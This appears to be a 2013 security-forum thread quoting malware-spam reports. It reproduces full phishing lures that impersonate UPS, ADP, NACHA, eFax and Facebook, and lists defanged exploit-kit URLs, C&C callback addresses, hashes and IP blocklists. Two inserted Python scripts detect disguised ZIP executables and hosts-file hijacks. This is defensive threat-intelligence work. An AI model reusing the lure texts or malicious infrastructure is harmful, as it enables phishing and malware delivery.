* https://www.virustotal.com/en/file/f95099fceb7d3e992b94455907b267c55e765a715e28df3ccee36c4127b2c92c/analysis/1364296589/
File name: LABEL-ID-NY26032013-GFK73.exe
Detection ratio: 7/46
Analysis date: 2013-03-26
** http://blog.dynamoo.com/2013/03/bank-of-america-spam-payment-receipt-25.html
Screenshot: http://threattrack.tumblr.com/post/46338583720/dhl-notification-spam
__
Fake eFax SPAM / hjuiopsdbgp .ru
- http://blog.dynamoo.com/2013/03/efax-corporate-spam-hjuiopsdbgpru.html
26 Mar 2013 - "This fake eFax spam leads to malware on hjuiopsdbgp.ru:
Date: Tue, 26 Mar 2013 06:23:36 +0800
From: LinkedIn [welcome @linkedin .com]
Subject: Efax Corporate
Attachments: Efax_Pages.htm
Fax Message [Caller-ID: 378677295]
You have received a 59 pages fax at Tue, 26 Mar 2013 06:23:36 +0800, (954)-363-5285.
* The reference number for this fax is [eFAX-677484317].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.
The attachment Efax_Pages.htm leads to a malicious payload at [donotclick]hjuiopsdbgp .ru:8080/forum/links/column.php (report here*) hosted on the following IPs:
66.249.23.64 (Endurance International Group, US)
69.46.253.241 (RapidDSL & Wireless, US)
95.211.154.196 (Leaseweb, Netherlands)
Blocklist:
66.249.23.64
69.46.253.241
95.211.154.196 ..."
* http://urlquery.net/report.php?id=1617697
... Detected suspicious URL pattern... Detected live BlackHole v2.0 exploit kit 95.211.154.196
___
Fake UPS SPAM / Label_8827712794 .zip
- http://blog.dynamoo.com/2013/03/ups-spam-label8827712794zip.html
26 Mar 2013 - "This fake UPS spam has a malicious EXE-in-ZIP attachment:
Date: Tue, 26 Mar 2013 20:54:54 +0600 [10:54:54 EDT]
From: UPS Express Services [service-notification @ups .com]
Subject: UPS - Your package is available for pickup ( Parcel 4HS287FD )
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.
CONFIDENTIALITY NOTICE...
The attachment Label_8827712794.zip contains a malicious binary called Label_8827712794.exe which has a VirusTotal score of just 6/46*. ThreatExpert reports** that the malware is a Pony downloader which tries to phone home to:
aseforum.ro (199.19.212.149 / Vexxhost, Canada)
23.localizetoday.com (192.81.131.18 / Linode, US)
Assuming that all domains on those are malicious, this is a partial blocklist:
..."
* https://www.virustotal.com/en/file/b1b537f767ce0a0cbf00141f97d5f814ecb9f2ae058895c9c85b3375b7d0e59e/analysis/1364312344/
File name: Label_8827712794.exe
Detection ratio: 6/46
Analysis date: 2013-03-26
** http://www.threatexpert.com/report.aspx?md5=c87f7ceeec9a9caa5e095b509d678f5e
Screenshot: http://threattrack.tumblr.com/post/46350420117/ups-package-pickup-spam
___
Fake Wire Transfer SPAM / hondatravel .ru
- http://blog.dynamoo.com/2013/03/wire-transfer-spam-hondatravelru.html
26 March 2013 - "This fake Wire Transfer spam leads to malware on hondatravel .ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of LinkedIn
Sent: 26 March 2013 11:52
Subject: Re: Wire Transfer Confirmation (FED_4402D79813)
Dear Bank Account Operator,
WIRE TRANSFER: FED68081773954793456
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
The malicious payload is at [donotclick]hondatravel .ru:8080/forum/links/column.php (report here*) hosted on:
66.249.23.64 (Endurance International Group, US)
69.46.253.241 (RapidDSL & Wireless, US)
These IPs were seen earlier with this attack**."
* http://urlquery.net/report.php?id=1618697
... Detected suspicious URL pattern... Blackhole 2 Landing Page 66.249.23.64
** http://blog.dynamoo.com/2013/03/efax-corporate-spam-hjuiopsdbgpru.html
Screenshot: http://threattrack.tumblr.com/post/46002028146/international-transfers-processing-service-spam
___
Fake TRAFFIC TICKET SPAM / hondatravel .ru
- http://blog.dynamoo.com/2013/03/ny-traffic-ticket-spam-hondatravelru.html
26 Mar 2013 - "I haven't seen this type of spam for a while, but here it is.. leading to malware on hondatravel .ru:
Date: Wed, 27 Mar 2013 04:24:14 +0330
From: "LiveJournal .com" [do-not-reply @livejournal .com]
Subject: Fwd: Re: NY TRAFFIC TICKET
New-York Department of Motor Vehicles
TRAFFIC TICKET
NEW-YORK POLICE DEPARTMENT
THE PERSON CHARGED AS FOLLOWS
Time: 2:15 AM
Date of Offense: 28/07/2012
SPEED OVER 50 ZONE
TO PLEAD CLICK HERE AND FILL OUT THE FORM
The malicious payload appears to be identical to this spam run* earlier today."
* http://blog.dynamoo.com/2013/03/wire-transfer-spam-hondatravelru.html
Screenshot: http://threattrack.tumblr.com/post/46359626397/new-york-traffic-ticket-spam
:mad::fear:
AplusWebMaster
2013-03-27, 15:32
FYI...
Fake Airline E-ticket receipt SPAM / illuminataf .ru
- http://blog.dynamoo.com/2013/03/british-airways-e-ticket-receipts-spam_27.html
27 Mar 2013 - "This fake airline ticket spam leads to malware on illuminataf .ru:
Date: Wed, 27 Mar 2013 03:23:05 +0100
From: "Xanga" [noreply @xanga .com]
Subject: British Airways E-ticket receipts
Attachments: E-Ticket-Receipt.htm
e-ticket receipt
Booking reference: JQ15191488
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services ...
The attachment E-Ticket-Receipt.htm leads to a malicious payload at [donotclick]illuminataf .ru:8080/forum/links/column.php (report here*) hosted on:
66.249.23.64 (Endurance International Group, US)
69.46.253.241 (RapidDSL & Wireless, US)
223.4.209.134 (Alibaba (China) Technology Co, China)
Blocklist:
66.249.23.64
69.46.253.241
223.4.209.134 ..."
* http://urlquery.net/report.php?id=1633301
... Detected suspicious URL pattern... Blackhole 2 Landing Page 69.46.253.241
___
Fake NACHA SPAM / mgithessia .biz
- http://blog.dynamoo.com/2013/03/nacha-spam-mgithessiabiz.html
27 March 2013 - "This fake NACHA spam leads to malware on mgithessia .biz:
From: "Олег.Тихонов@direct .nacha .org" [mailto:universe87 @mmsrealestate .com]
Sent: 27 March 2013 03:25
Subject: Disallowed Direct Deposit payment
Importance: High
To whom it may concern:
We would like to inform you, that your latest Direct Deposit via ACH transaction (Int. No.989391803448) was cancelled,because your business software package was out of date. The details regarding this matter are available in our secure section::
Click here for more information
Please consult with your financial institution to obtain the updated version of the software.
Kind regards,
ACH Network Rules Department
NACHA - The Electronic Payments Association
11329 Sunrise Valley Drive, Suite 865
Herndon, VA 20172
Phone: 703-561-1927 Fax: 703-787-1894
The malicious payload is at [donotclick]mgithessia .biz/closest/repeating-director_concerns.php, although I am having difficulty resolving that domain; it appears to be on 46.4.150.118 (Hetzner, Germany) and the payload looks something like this*.
* http://urlquery.net/report.php?id=1635808
... Detected live BlackHole v2.0 exploit kit 46.4.150.118
DNS services are provided by justintvfreefall .org which is also probably malicious. Nameservers are on 5.187.4.53 (Fornex Hosting, Germany) and 5.187.4.58 (the same).
Recommended blocklist:
46.4.150.118
5.187.4.53
5.187.4.58 ..."
___
Sendspace Spam
- http://threattrack.tumblr.com/post/46423886514/sendspace-spam
27 March, 2013 - "Subjects seen: You have been sent a file (Filename: [removed].pdf)
Typical e-mail details:
Sendspace File Delivery Notification:
You’ve got a file called [removed].pdf, (625.62 KB) waiting to be downloaded at sendspace.(It was sent by CONCHA ).
You can use the following link to retrieve your file:
Download
Thank you,
Sendspace, the best free file sharing service.
Malicious URLs:
my311 .com/info.htm - 173.246.66.199
contentaz .com/info.htm - 66.147.244.103
illuminataf .ru:8080/forum/links/column.php - 69.46.253.241, 66.249.23.64, 140.114.75.84 ..."
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/665842c6cd39c83729cc873b0f6a1f10/tumblr_inline_mkbrye8Kj91qz4rgp.png
___
Xerox WorkJet Pro Spam
- http://threattrack.tumblr.com/post/46443460555/xerox-workjet-pro-spam
27 March 2013 - "Subjects seen:
Fwd: Fwd: Scan from a Xerox W. Pro #[removed]
Typical e-mail details:
A Document was sent to you using a XEROX WorkJet PRO
SENT BY : Anderson
IMAGES : 4
FORMAT (.JPEG) DOWNLOAD
Malicious URLs:
thuocdonga .com/info.htm - 66.147.244.103
ilianorkin .ru:8080/forum/links/column.php - 69.46.253.241, 66.249.23.64, 140.114.75.84
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/471938a6819da525a3a5db17818c54d7/tumblr_inline_mkc615T7vs1qz4rgp.png
:fear::mad:
AplusWebMaster
2013-03-28, 14:16
FYI...
Fake Xerox ptr SPAM / ilianorkin .ru
- http://blog.dynamoo.com/2013/03/scan-from-xerox-w-pro-spam-ilianorkinru.html
28 March 2013 - "This fake printer spam leads to malware on ilianorkin .ru:
From: officejet @[victimdomain]
Sent: 27 March 2013 08:35
Subject: Fwd: Fwd: Scan from a Xerox W. Pro #589307
A Document was sent to you using a XEROX WorkJet PRO 481864299.
SENT BY : Omar
IMAGES : 9
FORMAT (.JPEG) DOWNLOAD
The malicious payload is at [donotclick]ilianorkin .ru:8080/forum/links/column.php (report here*) hosted on:
66.249.23.64 (Endurance International Group, US)
69.46.253.241 (RapidDSL & Wireless, US)
140.114.75.84 (TANET, Taiwan)
Blocklist:
66.249.23.64
69.46.253.241
140.114.75.84 ..."
* http://urlquery.net/report.php?id=1652917
... Detected suspicious URL pattern... Blackhole 2 Landing Page 140.114.75.84
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/471938a6819da525a3a5db17818c54d7/tumblr_inline_mkc615T7vs1qz4rgp.png
___
Fake Changelog SPAM / Changelog_Urgent_N992.doc.exe
- http://blog.dynamoo.com/2013/03/changelog-spam-changelogurgentn992docexe.html
28 March 2013 - "This fake "changelog" spam has a malicious attachment Changelog.zip which in turn contains a malware file named Changelog_Urgent_N992.doc.exe
From: Logistics Express [admin @ups .com]
Subject: Re: Changelog 2011 update
Hi,
as promised changelog,
Michaud Abran
VirusTotal* detects the payload as Cridex. The malware is resistant to automated analysis tools, but Comodo CAMAS reports** the creation of a file C:\Documents and Settings\User\Application Data\KB00085031.exe which is pretty distinctive. If your email filter supports it, I strongly recommend that you configure it to block EXE-in-ZIP files as they are malicious in the vast majority of cases."
* https://www.virustotal.com/en/file/f18154fdb0d0620f40c392e595daf6023b6799768b50a91059e26149e977eee6/analysis/1364462703/
File name: Changelog_Urgent_N992.doc.exe
Detection ratio: 18/46
Analysis date: 2013-03-28
** http://camas.comodo.com/cgi-bin/submit?file=f18154fdb0d0620f40c392e595daf6023b6799768b50a91059e26149e977eee6
___
Fake Facebook SPAM / ipiniadto .ru
- http://blog.dynamoo.com/2013/03/facebook-spam-ipiniadtoru.html
28 Mar 2013 - "The email address says Filestube. The message says Facebook. This can't be good.. and in fact this message just leads to malware on ipiniadto .ru:
Date: Thu, 28 Mar 2013 04:58:33 +0600 [03/27/13 18:58:33 EDT]
From: FilesTube [filestube @filestube .com]
Subject: You have notifications pending
facebook
Hi,
Here's some activity you may have missed on Facebook.
BERTIE Goldstein has posted statuses, photos and more on Facebook.
Go To Facebook
See All Notifications
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future or have your email address used for friend suggestions, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
The malicious payload is at [donotclick]ipiniadto .ru:8080/forum/links/column.php (report here*) hosted on the same IPs as used in this attack**:
66.249.23.64 (Endurance International Group, US)
69.46.253.241 (RapidDSL & Wireless, US)
140.114.75.84 (TANET, Taiwan)
Blocklist:
66.249.23.64
69.46.253.241
140.114.75.84 ..."
* http://urlquery.net/report.php?id=1661788
... Detected suspicious URL pattern... Blackholev2 redirection 66.249.23.64
** http://blog.dynamoo.com/2013/03/scan-from-xerox-w-pro-spam-ilianorkinru.html
___
Key Secured Message Spam
- http://threattrack.tumblr.com/post/46521340100/key-secured-message-spam
28 March 2013 - "Subjects seen:
Key Secured Message
Typical e-mail details:
You have received a Secured Message from:
[removed] @key .com
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - [removed]
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
This e-mail and any attachments are confidential and intended solely for the addressee and may also be privileged or exempt from
disclosure under applicable law. If you are not the addressee, or have received this e-mail in error, please notify the sender
immediately, delete it from your system and do not copy, disclose or otherwise act upon any part of this e-mail or its attachments.
If you have concerns about the validity of this message, please contact the sender directly. For questions about Key’s e-mail encryption service, please contact technical support at 888.764.0016.
Malicious URLs:
..."
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/080f2b096ba63540be68691958d3b275/tumblr_inline_mkdvh344wN1qz4rgp.png
___
ADP Netsecure Spam
- http://threattrack.tumblr.com/post/46507370924/adp-netsecure-spam
28 March 2013 - "Subjects seen:
ADP Immediate Notification
Typical e-mail details:
ADP Immediate Notification
Reference #: [removed]
Thu, 28 Mar 2013 -01:38:59 -0800
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
flexdirect .adp.com/client/login.aspx
Please see the following notes:
• Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
• Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Malicious URLs:
...
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2ea94e8508efe466d2cf4df216066fd1/tumblr_inline_mkdkuhagxw1qz4rgp.png
Fake ADP Spam / ipiniadto .ru
- http://blog.dynamoo.com/2013/03/adp-spam-ipiniadtoru.html
28 Mar 2013 - "This fake ADP spam leads to malware on ipiniadto .ru:
Date: Thu, 28 Mar 2013 04:22:48 +0600 [03/27/13 18:22:48 EDT]
From: Bebo Service [service @noreply.bebo .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 120327398
Thu, 28 Mar 2013 04:22:48 +0600
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www.flexdirect .adp .com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 975316004
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious landing page and recommended blocklist are the same as for this parallel attack* also running today."
* http://blog.dynamoo.com/2013/03/facebook-spam-ipiniadtoru.html
:fear::mad:
AplusWebMaster
2013-03-29, 17:55
FYI...
Fake 'Overdue Payment' Spam
- http://threattrack.tumblr.com/post/46594865279/overdue-payment-spam
March 29, 2013 - "Subjects seen:
Please respond - overdue payment
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 02/04/2013 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Caroline Givens
Malicious URLs:
..."
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9d94dc2151d5e12cc468b27c3c55f157/tumblr_inline_mkfg5xe7bS1qz4rgp.png
Fake Overdue payment SPAM / INVOICE_28781731.zip
- http://blog.dynamoo.com/2013/03/please-respond-overdue-payment-spam.html
29 Mar 2013 - "This spam comes with a malware-laden attachment called INVOICE_28781731.zip:
Date: Fri, 29 Mar 2013 10:33:53 -0600 [12:33:53 EDT]
From: Victor_Lindsey @key .com
Subject: Please respond - overdue payment
Please find attached your invoices for the past months. Remit the payment by 02/04/2013
as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Victor Lindsey
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY...
Unzipping the attachment gives a malware file called INVOICE_28781731.exe with an icon to look like a PDF file. VirusTotal* detections are 16/46 and are mostly pretty generic. Comodo CAMAS reports** a callback to topcancernews .com hosted on 199.19.212.149 (Vexxhost, Canada) which is also being used in this malware attack***. Looking for that IP in your logs might show if any of your clients."
* https://www.virustotal.com/en/file/d81fe01f843583d9a564f02887537d9a1a3e2b0fd5585dae536ef091ee4c1a16/analysis/1364586082/
File name: INVOICE_28781731.exe
Detection ratio: 16/46
Analysis date: 2013-03-29
** http://camas.comodo.com/cgi-bin/submit?file=d81fe01f843583d9a564f02887537d9a1a3e2b0fd5585dae536ef091ee4c1a16
*** http://blog.dynamoo.com/2013/03/ups-spam-label8827712794zip.html
___
Fake FlashPlayer/browser hijack in-the-wild
- http://blogs.technet.com/b/mmpc/archive/2013/03/26/there-was-a-flash-and-then-my-startpage-was-gone.aspx?Redirected=true
26 Mar 2013 - "... The file had been distributed with the file name FlashPlayer.exe and not surprisingly, when executed, it shows the following GUI, partly written in Turkish:
> https://www.microsoft.com/security/portal/blog-images/preflayer.jpg
... most users won’t realize that the program is going to change their browser’s start page. When hitting the button, this fake Flash Player installer downloads and executes a legitimate flash installer as FlashPlayer11.exe... It then changes the user’s browser start page. It changes the start page for the following browsers:
FireFox, Chrome, Internet Explorer, Yandex
... to one of the following pages:
hxxp ://www.anasayfada .net
hxxp ://www.heydex .com
These sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing... Domain info...
hxxp ://www.anasayfada .net - 109.235.251.146
hxxps ://flash-player-download .com/ - 31.3.228.202
hxxp ://www.yonlen .net/ - 37.220.28.122
hxxp ://www.heydex .com - 188.132.235.218 [ now > 109.200.27.170 ]
It’s a fairly simple ruse – misleading file name, misleading GUI, deliberately inaccessible EULA... misleading file properties – and some of the files are even signed. And yet, we’ve received over 70,000 reports of this malware in the last week. Social engineering doesn’t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something ‘feels’ wrong (like that missing scrollbar in the EULA) it may well be. Listen to those feelings and use them to protect yourself by saying 'no' to content you don't trust."
:mad:
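A defender-side check for the EXE-in-ZIP attachments that the Changelog, DHL, UPS and overdue-payment posts above describe, added here as an example; it is not code from dynamoo.com or any of the quoted blogs, and the ZIP it builds is constructed to resemble those attachments, not the real samples.

```python
"""Flag EXE-in-ZIP e-mail attachments (added example, not code from the quoted blogs).

Two checks per ZIP member:
  1. name-based: the final extension is executable, which also catches double
     extensions such as Changelog_Urgent_N992.doc.exe;
  2. content-based: the member starts with the PE 'MZ' magic even though it is
     named like a document (a renamed executable with a document icon).
Encrypted members cannot be inspected, so they are reported as well.
"""
from __future__ import annotations

import io
import zipfile
from pathlib import PurePosixPath

EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
DOCUMENT_EXTS = {".doc", ".pdf", ".xls", ".htm", ".html", ".txt"}
PE_MAGIC = b"MZ"


def classify_member(name: str, head: bytes) -> list[str]:
    """Return the reasons a ZIP member looks like a disguised executable (empty if none)."""
    reasons: list[str] = []
    # PurePosixPath.suffixes splits 'X.doc.exe' into ['.doc', '.exe']; ZIP names use '/'.
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    if suffixes and suffixes[-1] in EXECUTABLE_EXTS:
        reasons.append(f"executable extension {suffixes[-1]}")
        if len(suffixes) > 1 and suffixes[-2] in DOCUMENT_EXTS:
            reasons.append(f"double extension {''.join(suffixes[-2:])}")
    elif head.startswith(PE_MAGIC):
        reasons.append("PE header (MZ) in a file not named as an executable")
    return reasons


def scan_zip(zip_bytes: bytes) -> dict[str, list[str]]:
    """Map each suspicious member name to its reasons; an empty dict means nothing was flagged."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.flag_bits & 0x1:  # general-purpose bit 0: entry is encrypted
                findings[info.filename] = ["encrypted member, cannot inspect"]
                continue
            with zf.open(info) as fh:
                head = fh.read(2)  # only the magic bytes are needed
            reasons = classify_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def should_block(zip_bytes: bytes) -> bool:
    """Policy from the post above: any flagged member blocks the whole attachment."""
    return bool(scan_zip(zip_bytes))


def build_sample_zip() -> bytes:
    """Constructed sample modelled on the attachments quoted above (not the real files)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Changelog_Urgent_N992.doc.exe", b"MZ" + b"\x90" * 62)  # double extension
        zf.writestr("INVOICE_28781731.pdf", b"MZ" + b"\x00" * 62)            # renamed executable
        zf.writestr("readme.txt", b"nothing to see here\n")                   # benign member
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in scan_zip(build_sample_zip()).items():
        print(f"{member}: {', '.join(why)}")
```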
AplusWebMaster
2013-04-01, 22:21
FYI...
Fake Facebook Security Check Page
- http://blog.trendmicro.com/trendlabs-security-intelligence/malware-phishes-with-fake-facebook-security-check-page/
Mar 31, 2013 - "Facebook’s enduring popularity means that cybercriminals find it a tempting lure for their malicious misdeeds. A newly-spotted phishing scam is no exception. We came across a malware sample, which we detected as TSPY_MINOCDO.A. The goal is to -redirect- users who visit Facebook to a spoofed page, which claims to be a part of the social networking website’s security check feature, even sporting the tagline “Security checks help keep Facebook trustworthy and free of spam”. It does this by redirecting all traffic to facebook .com and www .facebook .com to the system itself (using the affected machine’s HOST file). This ensures that the user can never reach the legitimate Facebook pages. At the same time, the malware is monitoring all browser activity and redirects the user to the malicious site. Users eager to log into Facebook may fall victim to this ruse, taking the ‘security check’ at face value. This may result in them entering their details and thus exposing their credit card accounts to cybercriminal infiltration... we also discovered that the malware performs DNS queries to several domain names. What this means is that the people behind this are prepared for server malfunction and have a backup to continue stealing information. To stay safe and aware of these threats, always keep in mind that social networking websites would never ask for your credit card or online banking account details for verification..."
Screenshot: https://www.net-security.org/images/articles/fake-fb-sec-check.jpg
___
Fake Last Month Remit Spam
- http://threattrack.tumblr.com/post/46851040279/last-month-remit-spam
Apr 1, 2013 - "Subjects seen:
FW: Last Month Remit
Typical e-mail details:
File Validity: 04/05/2013
Company : [removed]
File Format: Office - Excel
Internal Name: Remit File
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: Last month remit file.xls
Malicious URLs:
...
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/be3ae421bf8e83ca33aefa8dfc3902af/tumblr_inline_mkl0qsyvth1qz4rgp.png
:mad::fear:
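A check for the hosts-file hijack that the TSPY_MINOCDO.A write-up above describes, added here as an example (not Trend Micro's code); the hosts-file content is constructed, and the watch list is an assumption a site would extend with its own banking and webmail domains.

```python
"""Detect hosts-file pinning of high-value domains (added example, not Trend Micro's code).

A legitimate workstation never maps facebook.com in its hosts file, so any entry
for a watch-listed domain is anomalous, whether it points at loopback (to force
the malware's local redirect, as in the write-up above) or at an external IP.
"""
from __future__ import annotations

import ipaddress

# Assumed watch list; extend with the domains your users log in to.
WATCHLIST = {"facebook.com", "www.facebook.com"}

# Constructed sample, not a real capture: the last three mappings model what the
# malware adds, the ad-blocking line shows a benign non-watch-listed entry.
SAMPLE_HOSTS = """\
# constructed hosts file
127.0.0.1       localhost
::1             localhost
# entries below model the hijack
127.0.0.1 facebook.com
127.0.0.1 www.facebook.com   # trailing comment after the mapping
0.0.0.0 ads.example  # hosts-based ad blocking, not on the watch list
"""


def parse_hosts(text: str):
    """Yield (ip, hostname, line_no) for every mapping, skipping comments and blanks."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # strip full-line and trailing comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # not a valid address, so not a mapping the resolver would use
        for host in fields[1:]:  # one line may list several hostnames
            yield ip, host.lower().rstrip("."), line_no


def find_hijacks(text: str, watchlist: set[str] = WATCHLIST) -> list[dict]:
    """Return one finding per watch-listed hostname (or subdomain of one) pinned in the hosts file."""
    findings = []
    for ip, host, line_no in parse_hosts(text):
        if host in watchlist or any(host.endswith("." + w) for w in watchlist):
            if ip.is_loopback or ip.is_unspecified:
                kind = "redirected to local machine"
            else:
                kind = f"redirected to {ip}"
            findings.append({"line": line_no, "host": host, "ip": str(ip), "kind": kind})
    return findings


if __name__ == "__main__":
    for f in find_hijacks(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['host']} -> {f['ip']} ({f['kind']})")
```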
AplusWebMaster
2013-04-02, 15:20
FYI...
Fake Changelog emails lead to malware
- http://blog.webroot.com/2013/04/02/spamvertised-re-changelog-as-promised-themed-emails-lead-to-malware/
April 2, 2013 - "... recently intercepted a malicious spam campaign that’s attempting to trick users into thinking that they’ve received a non-existent “changelog.” Once gullible and socially engineered users execute the malicious attachment, their PCs automatically become part of the botnet operated by the cybercriminal/gang of cybercriminals...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/email_spam_malware_malicious_software_social_engineering_changelog.png?w=869
Detection rate for the malicious attachment:
MD5: e01ea945b8d055c5c115ab58749ac502 * ... Worm:Win32/Cridex.E.
Upon execution, the sample creates the following processes on the affected hosts:
"C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\exp1.tmp.bat"
C:\Documents and Settings\<USER>\Application Data\KB00927107.exe
The following Registry Keys:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CFBDC89D4
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\S25BC2D7B ...
It then phones back to hxxp://85.214.143.90 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/ and to hxxp://91.121.90.92 :8080/AJtw/UCyqrDAA/Ud+asDAA/
We’ve already seen the same C&C (85.214.143.90) used in a previously profiled malicious campaign..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/f18154fdb0d0620f40c392e595daf6023b6799768b50a91059e26149e977eee6/analysis/1364475932/
File name: LLSMGR.EXE
Detection ratio: 35/46
Analysis date: 2013-04-01
- https://www.google.com/safebrowsing/diagnostic?site=AS:6724 - 85.214.143.90
- https://www.google.com/safebrowsing/diagnostic?site=AS:16276 - 91.121.90.92
___
Fake Sendspace SPAM / imbrigilia .ru
- http://blog.dynamoo.com/2013/04/sendspace-spam-imbrigiliaru.html
2 Apr 2013 - "This fake Sendspace spam leads to malware on imbrigilia .ru:
Date: Tue, 2 Apr 2013 03:57:26 +0000
From: "JOSIE HARMON" [HARMON_JOSIE @hotmail .com]
Subject: You have been sent a file (Filename: [redacted]-7191.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-463168.pdf, (172.5 KB) waiting to be downloaded at sendspace.(It was sent by JOSIE HARMON).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service...
The malicious payload is at [donotclick]imbrigilia .ru:8080/forum/links/column.php (report here*) hosted on the same IPs used in this attack**:
80.246.62.143 (Alfahosting GmbH, Germany)
94.103.45.34 (ANKARAHOSTING, Turkey)
Blocklist:
80.246.62.143
94.103.45.34 ..."
* http://urlquery.net/report.php?id=1757102
... Detected suspicious URL pattern... Blackhole 2 Landing Page 94.103.45.34
** http://blog.dynamoo.com/2013/04/end-of-aug-statement-required-spam.html
Also: http://threattrack.tumblr.com/post/46942210602/sendspace-spam
2 Apr 2013
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0e666483bc40644f546c02ae739932b3/tumblr_inline_mkmxxsEWUN1qz4rgp.png
___
Fake "End of Aug. Statement Required" SPAM / ivanovoposel .ru
- http://blog.dynamoo.com/2013/04/end-of-aug-statement-required-spam.html
2 April 2013 - "This spam leads to malware on ivanovoposel .ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply@bounce .linkedin .com] On Behalf Of LinkedIn
Sent: 02 April 2013 10:15
Subject: Re: FW: End of Aug. Statement Reqiured
Hallo,
as reqeusted I give you inovices issued to you per jan. (Microsoft Internet Explorer).
Regards
SHONTA SCHMITT
Alternate names:
NORIKO Richmond
Raiden MORRISON
Attachments:
Invoice_U13726798 .htm
Invoice_U453718 .htm
Invoice_U913687 .htm
The attachment leads to malware on [donotclick]ivanovoposel .ru:8080/forum/links/column.php (report here*) hosted on:
80.246.62.143 (Alfahosting GmbH, Germany)
94.103.45.34 (ANKARAHOSTING, Turkey)
Blocklist:
80.246.62.143
94.103.45.34 ..."
* http://urlquery.net/report.php?id=1751267
... Detected live BlackHole v2.0 exploit kit 94.103.45.34
:mad::mad:
AplusWebMaster
2013-04-03, 16:55
FYI...
Something evil on 151.248.123.170
- http://blog.dynamoo.com/2013/04/something-evil-on-151248123170.html
3 April 2013 - "151.248.123.170 (Reg .ru, Russia) appears to be active in an injection attack at the moment. In the example I saw, the hacked site has injected code pointing to [donotclick]fdozwnqdb.4mydomain .com/jquery/get.php?ver=jquery.latest.js which then leads to a landing page on [donotclick]db0umfdoap.servegame .com/xlawr/next/requirements_anonymous_ordinary.php (report here*) which from the URL looks very much like a BlackHole Exploit kit. This server hosts a lot of sites using various Dynamic DNS domains. I would recommend blocking the Dynamic DNS domains as a block rather than trying to chase down these bad sites individually. In my experience, Dynamic DNS services are being abused to such an extent that pre-emptive blocking is probably the safest approach..."
(Long list of recommended blocks at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1778882
___
Fake eFax SPAM / ivanikako .ru
